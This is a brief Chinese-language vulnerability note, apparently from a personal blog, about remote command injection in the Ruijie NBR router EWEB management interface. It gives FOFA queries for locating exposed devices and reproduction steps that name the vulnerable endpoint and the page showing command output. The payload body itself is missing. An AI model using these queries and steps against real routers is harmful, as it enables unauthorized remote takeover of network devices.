漏洞描述
i ⭐
锐捷NBR路由器 EWEB网管系统部分接口存在命令注入,导致远程命令执行获取权限
漏洞影响
s ✅
锐捷NBR路由器 EWEB网管系统
空间测绘
d ⭕
FOFA:title="锐捷网络-EWEB网管系统"
⭕
FOFA:icon_hash="-692947551"
漏洞复现
- ✅访问首页
- ✅执行Payload命令
1 | POST /guest_auth/guestIsUp.php |
- 然后访问页面 /guest_auth/test.txt 就可以看到命令执行的结果
个人博客
孤桜懶契:https://gylq.gitee.io/time